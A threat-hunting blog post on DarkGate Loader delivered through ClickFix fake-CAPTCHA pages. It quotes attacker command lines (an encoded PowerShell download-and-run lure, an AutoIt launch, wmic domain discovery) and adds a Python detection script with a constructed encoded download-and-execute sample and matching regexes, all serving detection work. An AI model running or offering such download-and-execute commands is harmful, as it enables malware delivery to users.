032. DarkGate Delivery via ClickFix Attack: Detection and Hunting Opportunities
Hello everyone! Today we're going to talk about DarkGate Loader and ClickFix attacks. Both are quite common; I'm not sure about ClickFix, but DarkGate is used by adversaries even in CIS.
Let's look at a recent ClickFix campaign analysed by Malwarebytes Labs. The chain starts with a malicious Google ad. If the victim clicks it, he or she lands on a fake "Verify you are human" page. After checking the box, the victim is shown instructions on how to open the Run dialog and paste a malicious PowerShell command:
cmd /c "powershell -w h -e [base64_encoded_commands] && I am human - Ray ID:4092"
As you can see, the threat actors appended an unusual string to make the "verification" look more legitimate. You can definitely use it for detection! If we decode the Base64, we find two cmdlets that adversaries very commonly use to download and run malicious files: "Invoke-WebRequest" and "Start-Process". So, this is another detection opportunity!
To run DarkGate Loader, the threat actors usually use AutoIt, for example:
"c:\temp\test\Autoit3.exe" c:\temp\test\script.a3x
You can use this knowledge for detection and hunting:
- Look for the AutoIt interpreter and AutoIt scripts (.a3x, .au3) in uncommon locations
- Look for renamed AutoIt executables - use the file metadata: "AutoIt v3 Script", "AutoIt3.exe", etc.
After that, discovery follows, for example querying the domain via WMIC:
cmd.exe /c wmic ComputerSystem get domain
Yes, this is another great detection opportunity!
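To show how the hunting ideas above fit together, here is an added triage script (not from the original post) that runs them over constructed process-creation events. The event format, the placeholder encoded command and the expected AutoIt install directories are assumptions.

```python
import base64
import re

# Constructed sample payload and events (image path, command line, PE file
# description); none of this is taken from the original post.
ENCODED = base64.b64encode(
    "Invoke-WebRequest -Uri https://placeholder.invalid/a; Start-Process a"
    .encode("utf-16le")).decode()
SAMPLE_EVENTS = [
    ("C:\\Windows\\System32\\cmd.exe",
     f'cmd /c "powershell -w h -e {ENCODED} && I am human - Ray ID:4092"', "cmd"),
    ("C:\\temp\\test\\Autoit3.exe",
     '"c:\\temp\\test\\Autoit3.exe" c:\\temp\\test\\script.a3x', "AutoIt v3 Script"),
    ("C:\\Users\\Public\\svchost.exe", "svchost.exe update.a3x", "AutoIt v3 Script"),
    ("C:\\Windows\\System32\\cmd.exe", "cmd.exe /c wmic ComputerSystem get domain", "cmd"),
    ("C:\\Program Files\\AutoIt3\\AutoIt3.exe",
     '"C:\\Program Files\\AutoIt3\\AutoIt3.exe" build.au3', "AutoIt v3 Script"),
]

CLICKFIX_MARKER = re.compile(r"I am human - Ray ID", re.I)
ENCODED_ARG = re.compile(r"(?:-encodedcommand|-enc|-e)\s+([A-Za-z0-9+/=]+)", re.I)
DOWNLOAD_EXEC_CMDLETS = ("invoke-webrequest", "start-process")
WMIC_DOMAIN = re.compile(r"\bwmic\b.*\bcomputersystem\s+get\s+domain\b", re.I)
# Assumed directories where a legitimately deployed AutoIt interpreter lives.
AUTOIT_EXPECTED_DIRS = ("c:\\program files\\autoit3\\", "c:\\program files (x86)\\autoit3\\")

def decode_encoded_command(cmdline):
    # PowerShell -e/-enc payloads are Base64 over UTF-16LE text.
    m = ENCODED_ARG.search(cmdline)
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le", "ignore") if m else ""
    except ValueError:  # malformed Base64
        return ""

def classify(image, cmdline, description):
    """Return the names of the hunting rules from the post that the event matches."""
    name = image.lower().rsplit("\\", 1)[-1]
    is_autoit = "autoit v3" in description.lower()  # PE metadata survives renaming
    rules = {
        "clickfix_marker": CLICKFIX_MARKER.search(cmdline),
        "encoded_download_exec": any(c in decode_encoded_command(cmdline).lower()
                                     for c in DOWNLOAD_EXEC_CMDLETS),
        "autoit_uncommon_location": is_autoit and not image.lower().startswith(AUTOIT_EXPECTED_DIRS),
        "autoit_renamed": is_autoit and "autoit3" not in name,
        "wmic_domain_discovery": WMIC_DOMAIN.search(cmdline),
    }
    return [rule for rule, hit in rules.items() if hit]

def hunt(events):
    # [(command line, matched rules)] for every event that matched at least one rule
    return [(c, classify(i, c, d)) for i, c, d in events if classify(i, c, d)]
```

Feed it real process-creation telemetry (e.g. Sysmon Event ID 1 with the OriginalFileName/Description fields) instead of the constructed events to use it for hunting.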